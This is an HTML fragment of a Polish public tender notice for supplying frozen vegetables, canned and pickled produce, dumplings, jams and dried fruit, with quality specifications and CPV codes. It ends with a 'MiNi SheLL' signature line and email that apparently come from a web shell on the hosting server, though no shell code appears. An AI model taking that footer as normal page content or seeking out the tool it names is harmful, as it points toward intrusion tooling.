jednolitość odmianowa - praktycznie jednolita odmianowo w partii, dopuszcza się inne odmiany o podobnych parametrach technologicznych i cechach jakościowych, wygląd - strąki całe, kształtne, niepołamane, sypkie, wolne od zlepieńców trwałych, niewielkie oszronienie nie stanowi wady, zawartość strąków uszkodzonych mechanicznie nie więcej niż - 5 %, ze skazami nie więcej niż - 3 %,barwa - intensywna  zielona, nie zbrązowiała, praktycznie jednolita w całej partii, Smak i zapach - typowy dla świeżej fasoli, całkowicie wolny od obcego smaku i zapachu. Konsystencja w stanie zamrożonym - twarda, po ugotowaniu - krucha bez mączystych ziaren, niegąbczasta, niewłóknista. Zanieczyszczenia - strąki czyste, bez zanieczyszczeń roślinnych i mineralnych
Cechy dyskwalifikujące:
strąki uszkodzone mechanicznie, odcinki strąków nacięte, częściowo połamane, strąki niekształtne,
strąki młode, o ziarnach słabo zaznaczonych, niewyrośnięte nie oddzielające się od miąższu strąka,
strąki dojrzewające, z pełni wyrośniętymi ziarnami, niejednolite pod względem przekroju, o rozjaśnionej barwie,
strąki włókniste, zawierające niepożądane łyko, włókno w szwach, albo wyściółkę pergaminową w okrywach,
strąki ze skazami, niejadalny koniec strąka, strąki z oparzeliną mrozową. Opakowanie nie mniejsze niż 2500g
Mieszanka warzywna typu carska, mrożona, gat.I, CPV: 153 31170-9
Skład : kalafior, fasolka szparagowa, marchewka, groszek                       
Cechy dyskwalifikujące:
zanieczyszczenia pochodzenia roślinnego, zanieczyszczenia mineralne-gleba, piasek,
zanieczyszczenia obce insekty lub ich części, drewno, tworzywa sztuczne, metal itp.
Opakowania minimum 2500g
Mieszanka warzywna typu królewska, mrożona, gat.I, CPV: 15331170-9
Skład : kalafior, brokuły, marchew                   
Cechy dyskwalifikujące:
zanieczyszczenia pochodzenia roślinnego, zanieczyszczenia mineralne-gleba, piasek,
zanieczyszczenia obce insekty lub ich części, drewno, tworzywa sztuczne, metal itp.
Opakowania minimum 2500g
Mieszanka warzywna 7- skł., mrożona, gat.I, CPV: 15331170-9
Skład : fasolka szparagowa, kalafior, brukselka, marchew kostka, por krążki, seler, pietruszka. 
Opakowania minimum 2500g
Cechy dyskwalifikujące:
zanieczyszczenia pochodzenia roślinnego, zanieczyszczenia mineralne-gleba, piasek,
zanieczyszczenia obce insekty lub ich części, drewno, tworzywa sztuczne, metal itp.
Papryka mrożona, gat.I, CPV: 153 31170-9
Typu paprykowe Trio 
Cechy dyskwalifikujące:
zanieczyszczenia pochodzenia roślinnego,  zanieczyszczenia mineralne-gleba, piasek,
zanieczyszczenia obce insekty lub ich części
Opakowania minimum 2500g
Włoszczyzna w paski mrożona, gat.I, CPV: 153 31170-9
Skład: marchewka, pietruszka, seler, por. Opakowania minimum 2500g
Cechy dyskwalifikujące:
zanieczyszczenia pochodzenia roślinnego, zanieczyszczenia mineralne-gleba, piasek,
zanieczyszczenia drewno, tworzywa sztuczne, metal itp.obce insekty lub ich części,
Natka pietruszki siekana mrożona, gat. I, CPV: 153 31170-9
Opakowanie minimum 2000g

Koperek siekany mrożony, gat. I, CPV: 153 31170-9
Opakowanie minimum 2000g
Mieszanka 5-składnikowa, gat. I, CPV: 15331170-9
Skład: czerwona fasola, marchew, groszek, kukurydza, fasolka szparagowa
Opakowanie minimum 2000g
Cechy dyskwalifikujące:
zanieczyszczenia pochodzenia roślinnego zanieczyszczenia mineralne-gleba, piasek,
zanieczyszczenia drewno, tworzywa sztuczne, metal itp.obce insekty lub ich części
Warzywa na patelnię z ziemniakami, gat. I, CPV: 15331170-9
Skład: ziemniaki, , kukurydza, marchew, fasola, cebula, kalafior, koper. Opakowanie minimum 2000g
Cechy dyskwalifikujące:
zanieczyszczenia pochodzenia roślinnego, zanieczyszczenia mineralne-gleba, piasek,
zanieczyszczenia drewno, tworzywa sztuczne, metal itp.obce insekty lub ich części
Mieszanka kompotowa, owocowa, 4 - skł., mrożona, gat.I, CPV: 15332100-5
Opakowania minimum 2500g 
Cechy dyskwalifikujące:
zanieczyszczenia mineralne-gleba, piasek, zanieczyszczenia obce insekty lub ich części, drewno, tworzywa sztuczne, metal itp..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.33.21.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. jakość i walory smakowe - 20.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Fasolka czerwona konserwowa, gat.I, CPV: 15331400-1
Opakowanie - puszka metalowa o pojemności powyżej 2000g (waga wsadu z odciekiem)
Wymagania klasyfikacyjne:
Ziarna fasoli luzem w zalewie konserwującej.Ziarna całe nieuszkodzone, zalewa  mętna z osadem tkanki roślinnej na dnie opakowania. Konsystencja miękka - wyrównana.Smak i zapach - charakterystyczny dla fasoli bez obcych smaków i zapachów Cechy dyskwalifikujące: obce posmaki, zapachy, smak mocno słony, kwaśny, stęchły, niedostateczna ocena organoleptyczna produktu, 
objawy zapleśnienia, psucia
Groszek konserwowy, gat.I, CPV: 15331400-1
- a 400g (+ - 20%)
Waga wsadu z odciekiem
- a 2600g (+ - 20%)
Waga wsadu z odciekiem
Opakowanie - puszka metalowa
Wymagania klasyfikacyjne:
Ziarna młodego groszku luzem w zalewie konserwującej
Ziarna całe nieuszkodzone, zalewa barwy żółtawo - zielonej, opalizująca lub mętna z osadem tkanki roślinnej na dnie opakowania,
Konsystencja miękka - wyrównana
Smak i zapach - charakterystyczny dla groszku bez obcych smaków i zapachów Cechy dyskwalifikujące:
obce posmaki, zapachy, smak mocno słony, kwaśny, stęchły, niedostateczna ocena organoleptyczna produktu, 
objawy zapleśnienia, psucia
Kukurydza konserwowa, gat.I, CPV: 15331400-1
- a 340g (+ - 20%)
Waga wsadu z odciekiem
- a 2600g (+ - 20%)
Waga wsadu z odciekiem
Opakowanie - puszka metalowa. 
Wymagania klasyfikacyjne: Ziarna młodej kukurydzy luzem w zalewie konserwującej. Ziarna całe nieuszkodzone, zalewa barwy żółtawej i żółta, opalizująca lub mętna z osadem tkanki roślinnej na dnie opakowania. Konsystencja miękka - wyrównana, smak i zapach - charakterystyczny dla kukurydzy bez obcych smaków i zapachów.
Cechy dyskwalifikujące: obce posmaki, zapachy, smak mocno słony, kwaśny, stęchły, niedostateczna ocena organoleptyczna produktu, objawy zapleśnienia, psucia
Ogórki konserwowe, całe, kl.I, CPV: 15331500-2
Opakowanie - słój szklany o masie netto 2,55 kg (+ - 5%)
Wymagania klasyfikacyjne : produkt spożywczy otrzymany ze świeżych ogórków, przypraw aromatyczno - smakowych, zalanych zalewą octową z dodatkiem soli i cukru, utrwalony przez pasteryzację w opakowaniu hermetycznie zamkniętym struktura - dość luźno ułożone całe ogórki, jędrne, chrupkie, powierzchnia ogórków wolna od uszkodzeń mechanicznych i plam chorobowych, na przekroju poprzecznym widoczne słabo wykształcone nasiona,ogórki powinny być proste w kształcie foremnym zbliżonym do walca o długości od 6,0 do 8,0cm, smak i zapach - charakterystyczny dla ogórków konserwowych słodko - kwaśny z wyczuwalnym smakiem i aromatem przypraw
wygląd zalewy - jasnożółta, klarowna z lekką opalizacją, dopuszcza się osad pochodzący z przypraw (kopru, chrzanu, gorczycy, itp.),zawartość soli kuchennej nie więcej niż 1,5 % wag. 
Cechy dyskwalifikujące: obce posmaki, zapachy, smak mocno słony, stęchły, niedostateczna ocena organoleptyczna produktu, objawy zapleśnienia, psucia, ich nadmierna miękkość.
Papryka konserwowa, ćwiartki, kl. I, CPV: 15331500-2
Opakowanie - słój szklany o masie netto 2,50 kg  (+ - 5%)
Wymagania klasyfikacyjne: produkt spożywczy otrzymany z papryki świeżej półsłodkiej, słodkiej, pozbawionej gniazd nasiennych i innych części niejadalnych w zalewie octowej z dodatkiem soli, cukru, olejów jadalnych oraz roślinnych przypraw aromatyczno - smakowych i poddany procesowi pasteryzacji. wygląd - papryka świeża połówki marynowana, konsystencja - papryka jędrna lekko miękka, nierozpadająca się,
smak i zapach - charakterystyczny dla papryki, kwaśnosłodki, złagodzony dodatkiem oleju, zawartość soli kuchennej nie więcej niż - 1,0 %. 
Cechy dyskwalifikujące: obce posmaki, zapachy, smak mocno słony, stęchły, niedostateczna ocena organoleptyczna produktu, rozpadająca się papryka
objawy zapleśnienia, psucia
Oliwka w zalewie, kl I, CPV: 15331450-6
Skład: oliwki, woda, sól
Opakowanie - słoik szklany o pojemności 300g (+ - 5%)
Patison konserwowy, gat.I, CPV: 15331500-2
Opakowanie - słój szklany o masie netto 0,86 kg  (+ - 5%)
Wymagania klasyfikacyjne :
produkt spożywczy otrzymany ze świeżych patisonów, przypraw aromatyczno - smakowych, zalanych zalewą octową z dodatkiem soli i cukru, 
utrwalony przez pasteryzację w opakowaniu hermetycznie zamkniętym
Cechy dyskwalifikujące:
obce posmaki, zapachy, smak mocno słony, stęchły, niedostateczna ocena organoleptyczna produktu, objawy zapleśnienia, psucia, ich nadmierna miękkość
Pieczarki konserwowe, całe, gat.I, CPV: 15331500-2
Opakowanie - słój szklany o masie netto 2,5kg (+ - 5%)      
Wymagania klasyfikacyjne:
pieczarki marynowane całe o średnicy kapelusza min. 2,5 cm z ogonkiem                   Dopuszczalne tolerancje:
dopuszcza się obecność zanieczyszczeń mineralnych w ilości nie większej niż 0,1 %
Cechy dyskwalifikujące:
obce posmaki, zapachy, smak mocno słony, kwaśny, stęchły, niedostateczna ocena organoleptyczna produktu, objawy zapleśnienia, psucia
Sałatka szwedzka, gat.I, CPV: 15331500-2
Opakowanie - słój szklany o masie netto 2,5kg (+ - 5%)
Wymagania klasyfikacyjne:
produkt spożywczy otrzymany z krojonych w plastry świeżych ogórków i cebuli, w zalewie z dodatkiem kwasów spożywczych, soli, cukru, przypraw aromatyczno - smakowych i poddany procesowi pasteryzacji.
wygląd - plastry, talarki, ogórków i cebuli zanurzone w lekko żółtawej, klarownej, opalizującej zalewie z osadem pochodzącym od użytych dodatków, przypraw i warzyw,
konsystencja - ogórki i cebula lekko miękkie, nierozpadające się, konsystencja wyrównana,
smak i zapach - charakterystyczny dla użytych składników, kwaśnosłodki,
zawartość soli kuchennej nie więcej niż - 1,5 % 
Cechy dyskwalifikujące:
obce posmaki, zapachy, smak stęchły, niedostateczna ocena organoleptyczna produktu, 
objawy zapleśnienia, psucia
Sałatka z selera o smaku łagodnym, gat.I, CPV: 15331500-2
Opakowanie - słój szklany o masie netto 1,40kg (+ - 5%)
Skład : seler, kwasek cytrynowy spożywczy, sól, cukier

Szczaw konserwowy, gat.I, CPV: 15331500-2
Skład : szczaw, woda, sól
Opakowanie - słój szklany o masie netto 2,60 kg (+ - 5%)
Wymagania klasyfikacyjne: 
produkt spożywczy otrzymany ze świeżych przetartych lub pokrojonych liści szczawiu z dodatkiem soli kuchennej, utrwalony przez pasteryzację struktura - jednolita przetarta masa min. 98 % o barwie oliwkowo zielonej do ciemnozielonej, smak i zapach - charakterystyczny dla przecieru szczawiowego, lekko słony, zawartość soli kuchennej nie więcej niż - 2,0 %, 
Dopuszczalne tolerancje: dopuszcza się obecność zanieczyszczeń mineralnych w ilości nie większej niż 0,1 %, dopuszcza się rozwarstwienie masy szczawiowej,                Cechy dyskwalifikujące: obce posmaki, zapachy, smak mocno słony, kwaśny, stęchły, niedostateczna ocena organoleptyczna produktu,  objawy zapleśnienia, psucia
Koncentrat pomidorowy, gat. I, CPV: 15331427-6
Opakowanie a 2 kg (+ - 20%)
Opakowanie - słój szklany 
Chrzan, gat. I, CPV: CPV15331500-2
Opakowanie - słój szklany o masie netto 0,9 kg  (+ - 5%).
Wymagania klasyfikacyjne:
produkt spożywczy otrzymany ze świeżych, pozbawionych skórki tartych korzeni chrzanu, kwasku cytrynowego z dodatkiem soli i cukru, struktura - przetarta masa z zawartością drobnych fragmentów korzeni chrzanu smak i zapach - charakterystyczny dla chrzanu, lekko piekący, kwaśnosłodki, zawartość soli kuchennej nie więcej niż - 2,0 %, barwa biała lub biało kremowa.
Dopuszczalne tolerancje: dopuszcza się obecność zanieczyszczeń mineralnych w ilości nie większej niż 0,03 % dopuszcza się rozwarstwienie przetartego chrzanu oraz barwę o odcieniu szarawym. 
Cechy dyskwalifikujące: obce posmaki, zapachy, smak mocno słony, stęchły, niedostateczna ocena organoleptyczna produktu,  objawy zapleśnienia, psucia
Ćwikła z chrzanem, gat. I, CPV: 15331500-2
Skład: chrzan, buraczki, woda, cukier, sól, ocet spirytusowy
Opakowanie - słój szklany o masie netto 0,27kg (+ - 5%).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.14.00-1, 15.33.15.00-2, 15.33.14.50-6, 15.33.14.27-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Knedle z truskawkami, mrożone, gat. I, CPV15313000-5  
Opis : kształt okrągły. Konsystencja ciasta po obróbce kulinarnej jednolita, barwa biało 

- kremowa. Barwa nadzienia - charakterystyczna dla użytych składników. Zawartość nadzienia w stosunku do ciasta nie mniejsza niż 18%.Waga 1 szt - 50g
Opakowanie - torby foliowe 2-3 kg. Karton zbiorczy 10 - 20 kg

Kopytka ziemniaczane, świeże, gat.I, CPV15313000-5            
Wymagania klasyfikacyjne:
wyrób kulinarny, półprodukt przygotowany z ciasta ziemniaczanego, z dodatkiem mąki ziemniaczanej, pszennej i przypraw, struktura i konsystencja ciasta: jednolita, lekko porowata, wygląd: kształt i wielkość charakterystyczne dla sposobu uformowania wyrobów, wyrównane w opakowaniu, o barwie biało - kremowej, 
smak i zapach - charakterystyczny dla ciasta ziemniaczanego,
Dopuszczalne tolerancje:
dopuszcza się nieliczne zlepieńce rozpadające się przy niewielkim nacisku oraz nieznaczne  uszkodzenia nie wpływające na obniżenie walorów użytkowych wyrobów, Cechy dyskwalifikujące:
obce posmaki, zapachy, (gorzki, jełki, stęchły, itp.),niedostateczna ocena organoleptyczna produktu przed i po przyrządzeniu (np. rozerwane ciasto rozpadanie się kopytek w czasie obróbki termicznej, zdeformowane kształty), zanieczyszczenia mechaniczne i organiczne, objawy  pleśnienia, psucia, obecność szkodników oraz ich pozostałości, brak oznakowania opakowań, ich uszkodzenia mechaniczne, zabrudzenia. Opakowanie - torby foliowe 2-3 kg. Karton zbiorczy 10 - 20 kg
Kluski śląskie mrożone, gat. I, CPV15313000-5
Opis : kształt okrągły. Konsystencja po obróbce kulinarnej elastyczna i miękka, barwa kremowa 
Waga 1 szt - 50g
Opakowanie - torby foliowe 2-3 kg. Karton zbiorczy 10 - 20 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.30.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. jakość i walory smakowe - 20.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas konserwowy, kostka, gat.I, CPV: 15332100-5
- a 565g ( + - 20%)
Waga wsadu z odciekiem 
- a 3300g ( + - 20%)
Waga wsadu z odciekiem
Opakowanie - puszka metalowa


Dżem niskosłodzony, opakowanie - wiaderko plastikowe a 3,7 kg (+ - 10%), gat.I
CPV: 15332290-3
- brzoskwiniowy
Skład : brzoskwinia, woda, cukier, substancja żelująca (pektyna), regulator kwasowości (kwas cytrynowy, kwas askorbinowy), zagęstnik (guma guar), substancja konserwująca (sorbinian potasu), stabilizator (chlorek wapnia)
- czarna porzeczka
Skład: czarna porzeczka, woda, cukier, substancja żelująca (pektyna), regulator kwasowości (kwas cytynowy), substancja konserwująca (sorbinian potasu), stabilizator (chlorek wapnia)
- wiśniowy
Skład : wiśnie, woda, cukier, substancja żelująca (pektyna), regulator kwasowości (kwas cytrynowy), zagęstnik  (guma guar), substancja konserwująca (sorbinian potasu), stabilizator (chlorek wapnia)


Orzechy włoskie łuskane. gat.I, CPV: 15332300-7
Opakowania : worek foliowy 0,5 kg (+ -5%)
Wymagania minimalne: bez objawów pleśni i gnicia

Rodzynki , gat.I, CPV: 15332410-1 a 1 kg  (+ -5%) Wymagania klasyfikacyjne: smak i zapach - charakterystyczny, aromatyczny, słodko - kwaśny, barwa - jasnożółta do ciemno-żółtej, konsystencja - lekko elastyczna, nie zlepiająca się przy nacisku, rodzynki  sypkie, niepozlepiane. Cechy dyskwalifikujące: Obce posmaki, zapachy, spalenizna, uszkodzenia spowodowane przez choroby, owady i szkodniki, objawy pleśnienia, psucia, stęchłość, obecność szkodników żywych, martwych, oraz ich pozostałości, (mole, rozkruszki, muchówki),brak oznakowania opakowań, ich uszkodzenia mechaniczne, zabrudzenia.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.21.00-5, 15.33.22.90-3, 15.33.23.00-7, 15.33.24.10-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. jakość i walory smakowe - 20.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogórki kiszone, kl. I. CPV: 15331000-7
Wymagania klasyfikacyjne:
produkt spożywczy otrzymany ze świeżych ogórków, przypraw aromatyczno - smakowych, zalanych zalewą z dodatkiem soli i poddanych naturalnemu procesowi fermentacji mlekowej, z ewentualnym dodatkiem kwasu sorbowego - w przypadku stosowania opakowań nie hermetycznych lub utrwalony w procesie pasteryzacji w opakowaniach hermetycznych.
struktura - dość luźno ułożone całe ogórki, jędrne, chrupkie
smak i zapach - charakterystyczny dla ogórków prawidłowo ukwaszonych, aromatyczny, słono kwaśny, ogórki powinny być proste, w kształcie foremnym zbliżonym do walca, o barwie oliwkowo zielonej o różnych odcieniach, powierzchnia wolna od uszkodzeń mechanicznych i plam chorobowych, wielkości od 6 do 15cm,
wygląd zalewy - od białoszarej do zielonkawo szarej, lekko mętny, dopuszcza się osad pochodzący z przypraw (kopru, chrzanu, gorczycy, czosnku itp.),
dopuszczalne tolerancje:
dopuszcza się stosowanie nasion kminku, kopru, kolendry, chrzanu, gorczycy, czosnku dopuszcza się ogórki z wadami kształtu w stosunku do masy netto nie przekraczającej 15% 
Cechy dyskwalifikujące:
obce posmaki, zapachy, smak mocno słony, niekwaśny, stęchły, niedostateczna ocena organoleptyczna produktu objawy zapleśnienia, psucia, ich nadmierna miękkość (komory nasienne wypełnione nieprawidłowo),
obecność szkodników żywych, martwych, oraz ich pozostałości,
brak oznakowania opakowań, ich uszkodzenia mechaniczne, zabrudzenia
Opakowanie 
opakowanie jednostkowe - beczka z tworzywa sztucznego (materiał opakowaniowy dopuszczony do kontaktu z żywnością) od 50 kg do 100kg,
Kapusta kwaszona, kl. I: CPV: 15331000-7
Wymagania klasyfikacyjne:
produkt spożywczy otrzymany z kapusty głowiastej białej, oczyszczonej z liści zewnętrznych, pokrojonej, zasolonej i poddanej naturalnemu procesowi fermentacji mlekowej. 
struktura - kapusta pokrojona na skrawki, gdzie odległość mierzona między krawędziami cięcia na powierzchni liścia wynosi nie więcej niż 2 - 3 mm, skrawki jędrne, chrupkie barwa skrawków - biała lub kremowobiała z odcieniem żółtawym smak i zapach - charakterystyczny dla kapusty prawidłowo ukwaszonej, aromatyczny, słono kwaśny, wygląd soku - jasnoszary, opalizujący
zawartość soku - w stosunku do masy netto powinna odpowiadać 15 % wag, tzn. lekko uciskana pokrywa się sokiem, opakowanie jednostkowe - kapustę należy pakować zgodnie z PN - 77/A - 75032, w beczki drewniane lub z tworzywa sztucznego, z wkładką z worka polietylenowego (lub ewentualnie bez), beczki powinny być całkowicie wypełnione kapustą.
Dopuszczalne tolerancje: dopuszcza się stosowanie nasion kminku, kopru, kolendry, marchwi, jabłek i innych owoców jako przyprawy roślinne.
Cechy dyskwalifikujące: obce posmaki, zapachy, smak mocno słony, niekwaśny, stęchły, niedostateczna ocena organoleptyczna produktu,
objawy pleśnienia, psucia, niedostateczna ilość soku (wysuszenie kapusty),
Opakowanie: opakowanie jednostkowe - beczka z tworzywa sztucznego (materiał opakowaniowy dopuszczony do kontaktu z żywnością) od 80 do 100 kg,
Ogórki małosolne, kl. I, CPV: 15331000-7
Wymagania klasyfikacyjne: 
produkt spożywczy otrzymany ze świeżych ogórków, przypraw aromatyczno - smakowych, zalanych zalewą z dodatkiem soli i poddanych naturalnemu procesowi fermentacji mlekowej struktura - dość luźno ułożone całe ogórki, jędrne, chrupkie
smak i zapach - charakterystyczny dla ogórków małosolnych ogórki powinny być proste, w kształcie foremnym zbliżonym do walca, o barwie oliwkowo zielonej o różnych odcieniach, powierzchnia wolna od uszkodzeń mechanicznych i plam chorobowych, wielkości od 6 do 15cm, wygląd zalewy - od białoszarej do zielonkawo szarej, lekko mętny, dopuszcza się osad pochodzący z przypraw (kopru, chrzanu, gorczycy, czosnku itp.).
Dopuszczalne tolerancje:
dopuszcza się stosowanie nasion kminku, kopru, kolendry, chrzanu, gorczycy, czosnku dopuszcza się ogórki z wadami kształtu w stosunku do masy netto nie przekraczającej 15%. 
Cechy dyskwalifikujące: obce posmaki, zapachy, smak mocno słony, niekwaśny, stęchły, niedostateczna ocena organoleptyczna produktu objawy zapleśnienia, psucia, ich nadmierna miękkość(komory nasienne wypełnione nieprawidłowo),
obecność szkodników żywych, martwych, oraz ich pozostałości, brak oznakowania opakowań, ich uszkodzenia mechaniczne, zabrudzenia
Opakowanie: opakowanie jednostkowe - wiadro z tworzywa sztucznego (materiał opakowaniowy dopuszczony do kontaktu z żywnością) od 50kg do 100kg..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.10.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kolorowa papryka cięta w zalewie pomidorowej np. typu peperonata lub równoważne, gat. I, CPV: 15331130-7
Opakowanie - puszka o masie netto 2500g (+ - 10%)
Skład: papryka czerwona i żółta (72%); zalewa: cebula (14%), koncentrat pomidorowy (7%), cukier, olej roślinny, sól, skrobia modyfikowana, regulator kwasowości: kwas cytrynowy
Baza sosu pomidorowego z kawałkami pomidorów typu tomato pronto lub równoważne, gat. I, CPV: 15331130-7
Opakowanie - puszka o masie netto 2000g (+ - 10%)
Skład: pomidory (78%), koncentrat pomidorowy (18,5%), olej roślinny, sól, cukier, cebula suszona, regulator kwasowości: kwas cytrynowy.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.30-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com